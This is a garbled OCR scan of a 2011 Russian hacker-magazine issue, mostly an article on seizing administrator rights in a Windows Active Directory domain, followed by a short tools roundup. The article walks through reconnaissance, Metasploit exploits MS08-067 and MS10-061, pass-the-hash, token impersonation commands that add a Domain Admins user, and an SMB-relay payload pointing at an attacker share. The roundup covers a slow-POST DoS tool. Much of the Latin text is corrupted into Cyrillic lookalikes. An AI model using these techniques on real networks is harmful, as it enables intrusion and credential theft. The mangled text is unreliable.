Шагпіпд: іпсіисіе ( /ішадез/ .. /а<) [ ДипсДіоп . іпсіисіе] : 
Даііесі До ореп зДгеат: Іпѵаіісі агдитепД іп . . . 

ИЛИ 

Шгпіпд: іпсіисіе ( /ішадез/ .. /а<) [ ДипсДіоп . іпсіисіе] : 
Даііесі До ореп зДгеаш: Регтіззіоп сіепіесі . . . 

В первом случае сервер не нашел ни одной директории начинающей- 
ся с буквы «а» в корне, во втором — нашел. 

Далее можно запустить подбор второй буквы и так далее. Для ускоре- 
ния можно воспользоваться фонетикой (см. статью «Быстрее, выше 
и снова быстрее. Революционные подходы кэксплуатации 5С!І_-инъ- 
екций» в ][ 1 2.2009). Работает старая добрая техника эксплуатации 
слепых 50 1_- инъекций. 

В ходе проведения опытов было замечено, что иногда сервер сразу 
выдает найденный путь в сообщении об ошибке. Тогда подбирать при- 
дется только в случае, если директории начинаются с одного и того же 
символа. Отчегозависитвывод ошибки, ятаки неуспел разобраться 
и оставляю на суд общественности. 

Лирическое отступление 

Отрадно заметить, что репорту китайцев нашел и Маг, который опуб- 
ликовал ее в числе прочих в статье «Малоизвестные способы атак на 
ѵѵеЬ-приложения» ( впіррег.ги/ѵіеѵѵ/Іб/таІоігѵевІпуе-врозоЬу-аІак- 
па-ѵѵеЬ-ргіІогбепіѵа ) еще 1 9 апреля, но пояснения и акцента на этой 
уязвимости там не было, был только китайский пример, с которого я и 
начинал. -и- 



Сообщение об ошибке в функции РіпбРігсіКІе на М5ЭЫ и ответ на него. 2007 год... 
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взлом 



■ ■ Алексей Синцов □ ідіІаІЗесигіІуІа.зіпІзоѵгасІзес.ги) 




ПРОСТЕЙШИЙ 
ПРИМЕР СЕТИ 



Оотаіп Сопігоііегѵѵіііі сііепіз 




Ыеіѵѵогк Ргіпіег Ргіпіег 

АТАКИ НАДОМЕН 

Завладеваем корпоративной сетью 

• Большая часть всех корпораций, компаний и мелких фирм используют 
для построения корпоративной сети технологию Асііѵе Шгесіогу и ОС 
семейства ѴѴіпсІоѵѵз. Сегодняшняя статья будет посвящена простой теме - 
захвата прав администратора в домене обезличенной корпоративной сети. 



Мы, конечно, поговорим об уязвимостях в службах и ОС, но в 
основном разговор будет об общих проблемах в архитектуре сети 
и проблемах аутентификации. 

Домен. Просто домен 

Перед тем, как начать, посмотрим, что представляет собой 
абстрактная корпоративная сеть. Начнем с понятия Асііѵе 
Оігесіогу. На самом деле это служба каталогов, которая удобно хра- 
нит ресурсы сети и их «свойства». Типа каталога папочек в ящике, 
где описано, что за сервера в сети, что за рабочие станции, прин- 
теры, какие есть пользователи, в каких группах они состоят. Ящик 
в данном случае — это сервер (контроллер домена), где централи- 
зованно хранится вся эта информация. Администратор контрол- 
лера домена — царь в корпоративной сети. Вернее, он царь той 
ее части, которая состоит в домене. Если компьютер или сервер в 
нем не состоит, то прав у администратора на машину нет, так как 
аутентификация и авторизация проводится без участия контрол- 



лера домена. Однако в большинстве случаев почти все сервера и 
рабочие станции состоят в домене, так как ради этого, собственно, 
домен и поднимается. Понятно, что серверные ОС — это, в боль- 
шинстве своем, ѴѴіпсІоѵѵз 2000/2003/2008, а рабочки — ХР/ѴізІа/7. 
Можно намного подробнее описать, что такое домен и как он рабо- 
тает, но в таком случае места на рассказ о слабых местах практи- 
чески не останется. Для тех, кто хочет начать с основ — советую 
статью в русской Википедии: ги.ѵѵікіребіа.огд/ѵѵікі/АсІіѵе Рігесіогу . 

Сеть 

Как говаривали в Бип: «Компьютер — это сеть», поэтому рас- 
смотрим простейшую сеть. Самое главное, как ты уже понял, это 
контроллер домена. Это сердце сети. Контроллер отвечает за 
аутентификацию, доменные имена машин, политики для серве- 
ров и рабочих станций. То есть за все. Кроме основного сервера 
могут быть еще машинки, необходимые для организации бизнес- 
задач компании: почта, терминалки, базы данных и так далее. 
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Ы1Ш СЬаІепде гезропзе 

Потом идут рабочие станции. В простейшем (читай — худшем) 
случае вся эта тусовка располагается в одном сегменте сети. Как 
правило, если мы говорим о небольших компаниях, то так оно и 
есть. В больших компаниях все не так просто: в дело вступают 
сетевые устройства, которые разбивают сеть на сегменты, про- 
пиливая дырки из сегмента в сегмент для нужных протоколов, 
сетей и серверов. Во всем этом благополучии часто бывает и 
ѴѴі-РІ роутер, который дает доступ в сеть для любителей ноутбу- 
ков (кстати, именно роутер и становится основной точкой входа 
в сеть для плохих парней, но не он один). Атаки на браузер и 
плагины к нему — самый популярный способ проникнуть из 
интернета в сеть компании или банка. Кроме всего перечислен- 
ного, еще остаются варианты с троянами, подключениями к І_АІ\І 
через плохо контролируемые порты и, в конце-концов, банальный 
инсайд. В любом случае, все это выходит за рамки статьи, но 
понимать, что безопасность домена дело не последнее — все же 
необходимо. 

Разведка 

Любое дело начинается с разведки. Цель ясна — стать админи- 
стратором домена, но по пути к этой цели надо выявить критичные 
точки и... саму цель. Как же найти контроллер домена самым бес- 
шумным путем? Вспомним, что наш волшебный ящик с папками 
отвечает за имена ресурсов — 0Ы5-имена. Исходя из этого, оче- 
видно, что на искомом сервере должен быть поднят сервис домен- 
ных имен, то есть открыт 53-й порт. Но не спеши запускать птар. 

В случае, если ІР-адрес мы получаем по ОНСР, то он же нам и рас- 
кроет имя 0145-сервера, так что просто набери в консоли пзіоокир 
и с вероятностью 70% ты получишь адрес контроллера домена. Но 
сразу в лоб брутить пароли от домена, опять же, не рекомендует- 
ся — нужно оглядеться и посмотреть, кто есть вокруг. Определить 
вкусные цели, так сказать. Варианта два — АРР-пинг по подсети 
и опрос по 0145. АРР-РІІ40 это простой способ определить, жив 
компьютер сданным ІР-адресом или нет. Напомню, что согласно 
модели 051 ниже сетевого уровня у нас существует канальный. 
Именно по этому уровню физически определяется, на какую сете- 
вую карточку слать пакет. Таким образом, АРР-РІІ46 представляет 
собой следующий диалог: 

Хакер ко ВСЕМ: Ребят, в каком доме живет Петя 

Шеллкодов? 

Дом 3 к Хакеру: О, это ж я — Петя Шеллкодов! Чувак, 

тебе в дом номер 3 ! 




Осіау почти трехлетней давности от СопЛікег'а все еще 
можно встретить 



Другими словами, происходит широковещательный запрос по 
протоколу АРР, в рамках которого запрашивается МАС-адрес того 
чувака, которому присвоен искомый хакером ІР-адрес. Вариант 
очень быстрый и эффективный. В качестве инструментария реко- 
мендую птар либо Саіп&АЬеІ. Но можно и опросить сам домен 
— мол, расскажи, где у тебя что :). Если администратор домена 
недостаточно аккуратно настроил 0145, то мы можем попросить 
список всех записей для данного домена. Это называется транс- 
фер зоны 0145. Для данного действия достаточно подсоединить- 
ся к 0145 сервису и выполнить команду листинга зоны. Из-под 
винды это делается так: 

С : \> пзіоокир 

ВеІаиІЩ Зегѵег: міпсіотаіп. сіотаіп 

Аббгезз: 192.168.1.33 

>1з -б міпботаіп . сіотаіп > іііе.бхб 

Если все в порядке, то в файле бІе.М ты найдешь имена компью- 
теров и их ІР-адреса. Зачем это надо? В 80% случаев в имени 
компьютера заложена полезная информация, в частности — его 
назначение (например, для организации атаки «человек посере- 
дине» или поиска 5СН_-серверов). Если зона 0145 не отдается, то 
тогда для получения имени можно резолвить каждый ІР-адрес, 
который получен в результате АРР-скана (Саіп умеет это делать). 
Этот вариант потребует времени, но зато он более точный. Кроме 
имен компьютеров хорошо получить еще и список пользователей 
(имена учетных записей) домена. Опять же, если администратор 
домена недоделал свое дело, то получить юзеров можно, под- 
соединившись к контроллеру домена по так называемой нулевой 
сессии к ресурсу ІРС$. После чего можно попросить отдать спи- 
сок всех пользователей с комментариями. Эта информация может 
оказаться полезной для вычисления администраторов домена и 
прочих ключевых фигур. Кроме того, можно уже начинать под- 
бирать учетные записи, где логин пользователя такой же, как и 
пароль :). К слову, если админ все же запретил получение спи- 
ска пользователей, мы можем перебрать его сами. Дело в том, 
что каждый пользователь имеет идентификатор безопасности 
(5Ю). Если опрашивать домен, подставляя эти идентификато- 
ры и инкрементируя лишь значения РЮ (последние несколько 
байт 5Ю), то можно получить список пользователей. Хочу также 
отметить, что весь этот функционал включен в состав Саіп&АЬеІ, 
хотя можно воспользоваться и оригинальными тулзами Евгения 
Рудного (зісІ2и5ег). Выделив ключевые сервера и рабочие стан- 
ции, стоит их просканировать. Аккуратно и быстро — птар'ом. 

При этом даже не нужно сканить все порты с определением сер- 
висов и ОС — это шумно. Выделяем ключевые порты в зависи- 
мости от цели: для БД — порты основных БД плюс порты управ- 
ления (например, габтіп), для рабочек — шары (габтіп/ѵпс). В 
общем-то, про разведку можно писать еще много, на эту тему 
получится не одна статья, но самое важное я, вроде, описал. Да, 
и еще — всегда держи снифер под рукой, на стадии разведки он 
расскажет многое. Также тут не упоминается про атаки на свичи 



ХАКЕР 02 [145] 201 1 



► Обі 







взлом 





Зесигеа 

ОЬіесІ 



Зесигііу 



□езсгіріог 



ОЬіесІ 



Ассезз Токеп 

АззідпесІ ѵѵііеп изег 
Іодз оп 



Ассезз Токеп 



АззідпесІ ѵѵЬеп оЬіесІ із 
сгеаіесі 



Ассезз 


РеасІ 


Ехесиіе 


РепіесІ 


ѴѴгіІе 


Ассезз 




Ассезз 

РідМз 


Кідіііз 



РАСІ. 



и маршрутизаторы, но просто помни — они тоже могут быть сла- 
бым звеном (дефолтовые пароли/ЗЫМР строки доступа). 

Атака 

После разведки можно уже мочить. Как, когда, кого и чем — 
зависит от результатов разведки. Но один из самых простых 
вариантов — пробить эксплойтом в лоб. При этом эксплойт дол- 
жен быть такой, чтобы не уронил систему и гарантировал доступ 
:). Как правило, эти сплойты пришли к нам из кодов червей. 
Особо париться тут не стоит — открывай метасплойт, там уже все 
есть, и выполни ПОИСК: 

зеагсЪ шзО -С дгеаС 

В результате ты получишь список стабильных сплойтов для 
нашей любимой платформы. Из этого списка осталось только 
выбрать удаленные и направленные на службы. Скорее всего, 
это будут дети от СопШкег и Біихпеі, а именно — тв08-067 и 
тз 1 0-06 1 соответственно. Это хорошие, проверенные сплойты, 
не раз дававшие шеллы автору :). Собственно, для работы с ними 
никаких знаний почти не нужно. Только учти, что твІО-061 рабо- 
тает только в том случае, если на атакуемом компе готова служба 
печати, то есть расшарен принтер и у тебя хватит прав на печать. 
Поэтому удобно перед атакой просканить подсетку на расша- 
ренные принтеры или поискать их по домену — скорее всего, 
таким макаром ты попадешь на старые, заброшенные серваки, 
непропатченный принт-сервер или рабочую станцию. К слову — 
данный вариант очень шумный, и если в компании есть сетевая 
ЮЗ, то ты можешь быть обнаружен. Обращаю внимание, что ЮЗ 
так же ловят в сети сигнатуру шелла винды, так что в качестве 
нагрузки советую использовать теіегргеіег (он шифрует дан- 
ные) — автору это помогло. Что же делать, если с эксплойтами 
идти в бой страшно или все сервера и рабочки пропатчены? Как 
показывает практика, есть куча способов получить шелл без экс- 
плойтов. В дело вступают «слабые пароли». Это частая ситуация: 
даже если на доменные учетки пароли и сильные, то пароль на 
локальную учетную запись Администратора может быть слабым, 
так как устанавливался он, например, до ввода компа в домен 
и может быть любым. Более того, такой пароль, как правило, 
одинаковый для всех локальных админских учеток и на других 
машинах :). 

Все, только что сказанное, не просто догадки сумасшедшего, 
а частое явление в реальных компаниях. Но я хочу сказать об 



одном очень популярном методе проникновения — через СУБД. 
Чем больше компания, тем больше у них СУБД, а чем больше 
СУБД, тем больше шансов проникновения на эти сервера. И я 
опять про плохие пароли, например в М55СН_ 2000 это «за:5а», 
а в Огасіе 9і — «зузіепштападег». С более новыми БД сложнее, 
но и они — частые пациенты. Вообще вся эта глава посвяще- 
на главной задаче — получить шелл хоть на каком-то компе в 
домене. Я перечислил самые простые способы такого получения 
(как получить шелл из БД — это уже вне темы этой статьи, об 
этом много писалось ранее), которые не раз давали автору и его 
коллегам желанный доступ к системе, но по факту, конечно, все 
зависит от конкретной сети. 

НА5Н и токены 

Захват рабочей станции или сервера — это уже полдела. Но 
что же дальше? Как уже писалось выше, «Компьютер — это 
сеть». Данное правило применимо и для домена. Если был 
захвачен хоть один компьютер домена, можно с большой 
вероятностью говорить о захвате всего домена. В чем дело? А 
дело в доверенной системе, на которой основана сеть и систе- 
ма безопасности, как на уровне ОС, так и на уровне домена. 
Итак, что же делать на захваченном хосте в первую очередь? 
Сначала самое главное — понять свои права. В ряде случа- 
ев это будет І\ІТ АІІТН0РІТУ\5У5ТЕМ, в других — доменная 
учетная запись с небольшими правами. Но так или иначе на 
первом этапе нам нужны именно права системы, так что если 
мы их не имеем, то следует их получить. Получить их можно, 
например, прямо из метерпретера, в котором есть простая 
команда деізузіет. Данный модуль попробует поднять права 
в ОС, используя уязвимости М509-012, нашумевший М510-015 
(КіТгарСЮ) и не только. Однако в большинстве случаев жела- 
тельно, чтобы пользователь был в группе локальных админов 
— например, чтобы имперсонализироваться (об этом позже). 
Системные права нам нужны для того, чтобы выдрать все 
самое ценное из недр ОС, а именно ІМТБМ хэши, и список токе- 
нов безопасности. Зачем нам хэши? Чтобы брутить их? Нет. 
Чтобы использовать их. Дело в том, что для аутентификации в 
домене очень часто не нужен пароль — ведь винда не спра- 
шивает пассворд каждый раз, когда ты идешь на какую-нибудь 
шару в домене. Реализовано это с помощью ІЧТБМ Сбаіепде 
гезропзе аутентификации. Дело в том, что для такой аутенти- 
фикации знания пароля не нужно, достаточно только значения 
хэша. Фактически об этой проблеме было известно с середины 
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Саіп&АЬеІ. Подготовка к РЫБ зрооНпд 



После того, как мы выполнили имперсонализацию, система 
будет использовать права украденной учетки. То есть, мы стали 
админом домена. Соответственно, выполняем: 



АВР зрооЯпд — человек посередине 

90-х, но с годами мало что поменялось. Поэтому, достав хэши, 
ты можешь спокойно ходить по домену с правами пользовате- 
ля. Более подробно о хэшах можно почитать в статье Антона 
Карпова ака Іоха: 5еси гі1:у1а Ь. ги/а па 1ѵ1:і сз/362448. рЬ р . Я же 
расскажу про реальную историю захвата домена. Был, значит, 
получен доступ к компьютеру веб-девелопера через 80І_- 
инъекцию на его веб-стенде. Сервак был М880Б, учетка — 8А. 
Соответственно, через хр_стсІ5ЬеІ.І был закачан и запущен 
теіегргеіег, получен полноценный доступ с правами 8Ѵ8ТЕМ. 
Но ничего особо ценного для захвата домена на этом компе 
не нашлось, поэтому были изъяты хэши учетки программиста. 
Как известно, хэши хранятся в ОС во многих местах, но самое 
вкусное — это кэш І_8А, который «помнит» хэши последних 
юзеров. В любом случае есть еще и 8АМ-база. Автор советует 
использовать утилиты дзессіитр и ѵѵсе, с помощью которых 
можно полноценно дампить нужные хэши. А с этими хэшами 
уже лазить по домену, где, кстати, был найден принт-сервер. 
Учетка программиста состояла в группе, у которой были права 
на печать на одном из принтеров сервера. Используем хэши- 
учетки для модуля метасплойта, который эксплуатирует М810- 
061. 

тз10_061_зроо1зз>зек ЗМВБзег изег 
тз10_061_зроо1зз>зек ЗМВБотаіп БОМАШ 
тз10_061_зроо1зз>зек ЗМВРазз 010101010101010101010101 
01010101:01010101010101010101010101010101 

Эксплойт М810-061, запущенный от имени программиста, дал 
системный доступ к принт-серверу, где уже были найдены про- 
цессы с токенами администратора домена. Получается цепочка 
атак, которая приводит к захвату домена. 

Итак, мы попали на принт-сервер с правами системы, но мы 
еще не админы домена, однако я упомянул выше про токены. 
Токен — это объект ОС, который создается при логоне и дается 
каждому процессу, запущенному юзером. Этот токен — лако- 
мый кусочек. В нашем случае админ домена запустил какие-то 
процессы на принт-сервере, а у нас права системы на этом же 
сервере — соответственно мы имеем привилегии Беітрегзопаіе 
и можем спокойно использовать существующий токен «делегиро- 
вания» (несмотря на патч М809-012, который тут как бы не о чем). 
Выглядит это довольно просто: 

шеБегргеЦег> изе іпсодпіБо 
шеБегргеЦег> 1ізБ_Ьокепз -и 

текегргекег> ітрегзопаке_Ьокеп БОМАШ\\асІтіп 



текегргекег>зЬе11 

С : \міпс1оѵ\гз\зузкет32\>пек изег хакер р4зЗм_0Кс1 /АББ 
/БОМАШ 

С : \отіпс1оіл7з\зузкет32\>пек дгоир "Ботаіп АсЗтіпз" хакер 
/АББ /БОМАШ 

Команды исполнятся, и у контроллера домена появится новый 
администратор (кстати, не рекомендую так делать, так как в нор- 
мальных компаниях такой пользователь сразу будет обнаружен). 
Мораль истории такова: любая, даже самая маленькая дырочка, 
на самом незначительном сервере или рабочке может привести к 
захвату домена, так как «компьютер — это сеть»... 

Простые атаки или ЗМВ-РЕЬАУ 

Предыдущий (реально существовавший) пример показал, как 
получить права админа, зацепившись за любую машину домена. 
Тогда нам понадобились уязвимости, но они не всегда могут при- 
сутствовать, например, если поднят ѴѴ81І8 и все хосты домена 
своевременно получают обновления. Тем не менее, бывает так, 
что и без уязвимостей можно получить шелл на сервачке. Частый 
случай — через СУБД. Для этого требуется хоть какая-нибудь учет- 
ка на сервере СУБД. Кстати, вспоминая о дзессіитр: он дампит 
І_5А-секреты, в которых очень часто бывают пароли от БД и про- 
чего добра. В открытом виде. Кроме того, в больших компаниях 
часто есть различные ЕРР-системы, в которых аутентификация 
использует доменные учетные записи и различные пароли по 
умолчанию. К тому же, есть шанс найти 5СН_- инъекцию. В общем, 
любой доступ к БД нам подойдет. Мы говорим про М88СН_, как про 
наиболее частую СУБД в МісгозоІІ сетях, хотя и Огасіе тоже сойдет. 
Второй важный пункт — процесс СУБД должен быть запущен под 
доменной учетной записью, которая состоит в группе локальных 
админов для сервера СУБД. Если все эти условия соблюдены, то 
можно выполнить атаку 8МВ-РЕБАѴ через вызов хранимой про- 
цедуры хрщІігІхее/хрДДеехізі (которая также должна еще и быть 
доступна). В качестве параметра эти процедуры берут путь к папке/ 
файлу. Суть в том, что они понимают путь в формате ІІІМС, то есть 
могут обращаться к файлам на удаленном ресурсе. В случае, 
если эти ресурсы требуют аутентификацию, то происходит І\ІТІ_М 
сбаіепде гезропзе аутентификация, из-под которой, используя 
учетку, запущен процесс СУБД. Таким вот образом можно указать 
в качестве удаленного ресурса хост хакера с запущенным модулем 
8МВ-РЕБАУ (есть в составе метасплойта). Данный модуль реали- 
зует атаку «человек посередине», перенаправляя аутентифика- 
цию на другой сервер СУБД (например, на резервный — главное, 
чтобы учетка там имела права локального админа). Таким образом, 
сервер сгенерирует ответ и отправит его хакеру, который, в свою 
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очередь, передаст его серверу, где начата атака. В общем, класси- 
ческий «человек посередине». Таким образом хост хакера аутен- 
тифицируется на резервном сервере, закачает туда метерпретер и 
получит права учетки СУБД (так как она в группе локальных адми- 
нов, то это равносильно 8Ѵ8ТЕМ). Зачем нам второй сервер, ведь 
можно указать в качестве цели тот же сервер, откуда был послан 
запрос (то есть атака с сервера «А» на сервер «А»)? Вообще да, 
можно, но только если на сервере «А» не установлен патч для 
М508-068. В противном случае нужно два сервера. Примечание: 
автор заметил, что если мы атакуем кластер, то патч для М808-068 
не работает, поэтому можно выполнять атаку с ноды кластера на 
кластер и мы получим шелл на той же ноде. Данная уязвимость 
имеет смысл не только в контексте СУБД. Обычная Х88 может дать 
полноценный шелл, достаточно подсунуть админу домена следую- 
щий КОД: 

<ітд згс= " \ \аЦЦаскег\зЦага" > 

В любом случае, эта проблема не фиксится полностью, а потому 
атаки на основе 8МВ-РЕІ_АѴ — реальная угроза. 

Простые атаки. АРР-5РООРІІМС 

Нельзя не упомянуть и про старый добрый АРР-8Р00ЕІІЧ0 в 
контексте захвата домена. Атака основана на флуде АРР-ответов 
для хостов «А» и «Б» с хоста «В». Хосту «А» посылаются пакеты 
с утверждением, что ІР-адрес «Б» принадлежит машине с маком 
«В». Хосту «Б» посылаются пакеты с утверждением, что ІР-адрес 
«А» принадлежит машине с маком «В». Таким образом все пакеты 
идут на хост «В», который их потом пересылает по назначению. 
Простое описание классической атаки «человек посередине». 
Функционал полностью присутствует в Саіп&АЬеІ и Еііегсар. В 
контексте предыдущих тем можно сделать такое западло: вычис- 
лить админа (трансфер зоны ДНО), вычислить прокси-сервер или 
шлюз, устроить АРР-8Р00ЕІІМ6 и добавить в ХТМЛ-код пакета 
ответа от сервера к админу (в случае, если админ пошел на какой- 
нибуть веб-сайт) строчку вида <ітд 5гс="\\аиаскег\5Ьага">. То 
есть выполнить 8МВ-РЕБАУ атаку. Для этого нужно по мучаться 
с ЕЛегсар, но можно поступить и проще — поднять у себя веб- 
сервер с 8МВ-РЕБАУ модулем. 



Но это еще не все. Однажды мы делали внутренний пентест 
небольшой сетки, где все патчено-перепатчено, и пароли были 
очень стойкие, а больше там ломать-то было и нечего. Так как 
сетка маленькая, то сервера и рабочки были в одном сегменте — 
радость для любого АРР-флудера. По ДНО был вычислен админ 
и сервер терминалов. Начался спуфинг, и тут выяснилось, что 
один из админов использует старую версию протокола РОР, а 
как немногим известно — протокол версии меньше, чем шестая, 
уязвим к атаке «человек посередине». Таким образом, Саіп рас- 
шифровал РйР-трафик админа на сервер терминала. А с помо- 
щью тулзы для парсинга логов Саіп'а (ігопдеек.сот/сіоѵѵпіоасіз/ 
саіп-Р0Р-раг5ег.2Ір) был получен пароль админа домена. Такие 
вот истории... 

Баян 

В чем смысл этой статьи? Что я хотел сказать? Ведь ничего 
нового раскрыто не было — эти атаки, уязвимости и фичи были 
известны давно (некоторые уже даже в течение десяти лет). 
Просто кое-что невозможно полностью исправить — АРР- 
8 РО О РІ N Ѳ , 8МВ-РЕБАУ, воровство Токеп'ов, НА8Н-апб-РА88 и 
так далее. Эти вещи заложены глубоко в архитектуру домена, 

ОС и сети, что делает любую ошибку на любом незначительном 
хосте опасной для всего домена. 

Принцип «Компьютер — это сеть» работает вовсю. Потеряв 
один компьютер, с точки зрения безопасности мы можем поте- 
рять всю сеть. Было, конечно, не рассказано много чего еще: 
про парольные политики, сегментацию, настройку сетевого 
оборудования и прочее. Но я хотел обратить внимание на то, 
что любые вроде бы незначительные сервера и рабочки — зна- 
чительны, что любые уязвимости, вроде трансфера зоны 0І\І8 
— опасны. 

Даже имя компьютера имеет свою цену с точки зрения безопас- 
ности. Я видел компании, где компьютеры операторов систем 
банк-клиент имели имена вида Ьапксііепі-І и были они в 
домене, в том же сегменте сети. Пусть патченые, но ведь если 
я получу учетку домена (через другой хост, скажем, через принт- 
сервер), то потом вернусь на Ьапксііепі-І и буду там хозяином. 
Так что наша с тобой задача — грамотно построить сеть и устра- 
нить в ней слабые звенья... ін: 
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Программы 




Программа: ЕѵаІЬоокО.1 
ОС: *піх/ѵѵіп 
Автор: 5ТеІап Е$$ег 




Очень часто бываеттак, что ты получаешь 
доступ к интересному рбр-скрипту, но не 
можешь продолжать дальнейшую работу с ним 
из-за мерзопакостной обфускации. Не секрет, 
что рбр-кодеры любятзашифровыватьсвои 
творения, например, так: 

<?рЬр 

/* Бегло Ьу ѵялм.ркр-сгурк.сот */ 
$кеузкгоке1 = Ьазеб4_сіесо(іе ( "(32КуМГО5с 
ЗЕОУХІІе^ б4У2би2І9 ОсЦ ЬиЬНѴгБтроУтІѵМг Б 
ксА== " ) ; 

?> 

Как поступить в таком случае? Советую вос- 
пользоваться расширением для РНР Еѵаібоок 
за авторством Стефана «Наше Все»Эссера. 
Итак, данный инструмент представляет собой 
РНРехІепзіоп, с помощью которого ты сможешь 
поэтапно выполнитьскрипт, итем самым выяс- 
нить, что же он, собственно, делает. Алгоритм 
работы расширения заключается в простом 
прерывании вызова конструкции еѵаі и других 
функций сдинамическим вызовом кода. 
Распознается даже та кой код: 

<?рЬр 

аггау_тар ( 1 аззегк ' , 
аггау ( ' рЪріпІо ( ) 1 ) ) ; 

?> 

На выходе ты увидишь, что данная конструкция 
попыталась выполнить банальный "рЬріпбоО": 

Зсгірк кгіез ко еѵаіиаке кке Іоііотапд 
зкгіпд . 
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Мониторим систему правильно 



гекигп рЬріпко ( ) ; 

Бо уои члапк ко аііотд ехесикіоп? [у /Б] 

В *піх-системахустановка Еѵаібоок достаточно 
тривиальна: 

1. Проверяем систему на наличие РНР >= 5.2, 
рбр-сіеѵеі, РНР Іепд Орбтігег; 

2 . Создаем файлик гип.зИ со следующим 
содержанием: 

каг хѵіг еѵаІкюок-0 . 1 . каг . дг 

сб еѵаікоок 

рЬріге 

. /сопкідиге 

таке 

зибо таке іпзкаіі 

3. Запускаем расширение из консоли с пра- 
вами рута: зЬ гип.5б. 

После данного процесса ты легко сможешь вос- 
пользоваться всеми преимуществами Еѵаібоок. 
Например, так: рбр-сі ехІепзіоп=еѵаІЬоок.зо 
закодированный_скрипт.рбр. Статью на анг- 
лийском языке отавтора, а также комментарии 
к ней ты сможешь найти по адресу рбр-зесигііѵ. 
огд/201 0/05/1 3/агбсІе-сІесосІіпд-а-изег-зрасе- 
епсосІесІ-рЬр-зсгірІ: . 

Программа: Сопку 
ОС: *піх 

Автор Ьгепсіепі, іоетуге, ркоѵасз 

Настало время представить в нашем обзоре 
знаменитый никсовый монитор Сопку! 

Итак, Сопку — это программа, которая может 



отображать самую различную информацию в 
окне рута в X1 1 . Отображаемая информация 
может быть, например, такой: дата, температу- 
ра СРІІ (і2с), МРй инфо, СРІІ изаде, атакже все, 
что ты сам пожелаешь :) 

Основныефичи монитора: 

• отображение статусов ОСИ: плате, 
аптайм машины , использование СРБ, ис- 
пользование памяти и диска , статистика 
процессов ; 

• встроенная поддержка ШАР и РОРЗ ; 

• встроенная поддержка многих популярных 
плееров (МРБ, ХММ32 , ВМРх, Аибасіоиз) ; 

• расширяемость с помощью встроенной 
поддержки Биа и других твоих собственных 
скриптов и программ; 

• поддержка Іт1іЬ2 и Саіго; 

• отображение информации в виде текста, 
прогресс баров, виджетов. 

Установить сие чудо технического прогресса 
достаточно просто: 

БеЬіап/ЦЪипки : 

зибо арк-дек іпзкаіі сопку 

гсак /изг/зкаге/бос/сопку/ехатріез/ 

сопкугс . затріе . д 2 > ~/ . сопкугс 

Оепкоо : 

етегде арр-абтіп/ сопку 

РгееВЗБ: 

об /изг/рогкз/зузикііз /сопку && таке 
іпзкаіі сіеап 

Компиляция из сорцов (нужны девелопмент - 
библиотеки ХІ1) : 

$ . /сопкідиге 
$ таке 

• таке іпзкаіі 

После установки проги необходимо будет ее 
правильно сконфигурировать. 

1. Копируем пример конфига в домашнюю 
директорию: т.сзі /изг/збаге/сіос/сопку/ 
ехатріез/сопкугс. затріе. дт. > -/.сопкугс; 

2. Запускаем свой любимый редактор (напри- 
мер, ѵіт): ѵіт -/.сопкугс. 

3. Для примера получаем диаграмму скоро- 
сти закачки, для чего вписываем в конфиг 
следующее :${сІо\л/п5реесІд га рб КО 32,155 
104Е8В 0077т. 

В данном примере: 

гІО — интерфейс; 

32 — ширина; 

155 — длина; 

104Е8В — конечный цвет; 

007711 — начальный цвет. 
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Распределенный отказ в обслужива- 
нии по-новому 

4 . После внесения изменения в конфиг пере- 
читываем его: кіііаіі -5ІѲІІ5СР1 сопку. 

Как видишь, все достаточно просто. Напос- 
ледокхочу показать тебе описание основных 
переменныхСопку: 

1. ехес — выводит на экран текст, возвращае- 
мый вызываемой программой; 

2 . ехесЬаг и ехесдгарЬ — визуализируют 
вывод исполняемой команды в виде диаграм- 
мы или графика; 

3. ехесі и Іехесі — запускают команду циклом 
с интервалом; 

4 . іб_гиппіпд, і^ехізбпд и іМтоипІесІ — выво- 
дят все данные до епсіф если выполняется 
процесс, существует файл и подключена 
точка монтирования; 

5 . еізе — выводит событие, если ложны все 
вышестоящие выражения. 

Подробнейшую информацию, атакже все 
обновления и примеры конфиговты сможешь 
найти на официальном сайте монитора сопку. 
зоигсеЬгде.пеЬ 

Программа: ОѴѴА5Р НИР Ро$+ 
ТооІ 

ОС: ѴѴіпаоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор Тот Вгепапп 

Входе ОѴѴА5Р201 0 Арріісаііоп Зесигііу 
Сопіюгепсе, прошедшей в Вашингтоне, 
исследователи продемонстрировали то, как 
протокол НТТРможетпомочьхакерам провес- 
ти новую форму распределенной атаки типа 
«отказ в обслуживании», которая заваливает 
веб-сервера медленным НТТР Р05Т трафиком. 
Исследователь ВонгОнн Чи, в 2009 году первым 
обнаруживший атаку с группой исследовате- 
лей в Сингапуре, и разработчик Ргоасііѵе Різк 
Том Бреннантакже показали, каконлайн игра 
может быть использована для создания ботов 
для ботнета, который может управлять атакой 
НТТР Р05Т ООоЗ. Чи говорит, что НТТР обла- 
дает дефектами, и что все сервера или системы 
с веб-интерфейсом очень восприимчивы к 
такой атаке. «Если у вас есть веб-интерфейс, то 
мы можем разрушить его (этой атакой - прим, 
ред.)», — сказал Чи в начале этого месяца. 

В отличие оттрадиционной ООоЗ-атаки, где 
происходит очень много соединений за корот- 
кий период времени, новый тип атак«потреб- 
ляет соединения» и похож на относительно 
короткую очередь пассажиров, проходящих 
контроль, но где большинство -те, кого не- 
обходимо проверять дол го. Атака НТТР Р05Т 
посылает Р05Т-заголовки, которые позволяют 




Брутим Фейсбук 

серверуузнать, сколько информации переда- 
но, но когда дело касается самого сообщения, 
оно отсылается очень медленно (чтобы занять 
соединение и лишить сервера ресурсов). По 
словам Чи такая атака, использующая всего 
несколько тысяч медленныхсоединений НТТР 
Р05Т, может разрушить сайтза считанные 
минуты. 

Более подробную историю обнаружения дан- 
ного типа ООоЗ-атакитьі найдешь в слайдах 
0ѴѴА5Р по адресу оуѵазр.огд/ітадез/4/43/ 
1_ауег 7 РРОЗ.рсІ т. а для собственно 
тестирования атаки НТТР Р05Т ты можешь 
воспользоваться прогой 0ѴѴА5Р НТТР Розі 
ТооІ. Интерфейс утилиты достаточно прост. 
Для начала тестов тебе всего лишь необхо- 
димо выбрать тип атаки, ІіРЬжертвы, число 
соединений, частоту соединений, таймаут, 

II зе г- Ад епі, длину контента и переменную 
Р05Т. 

Все обновления и дополнительную информацию 
ищи на официальной страничке проекта. ' 
оѵѵазр.огд/іпбех.рЬр/ОѴѴАБР НТТР Розі ТооІ . 

Программа: РасеЬоокВгиіе 
ОС: ѴѴіпсіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
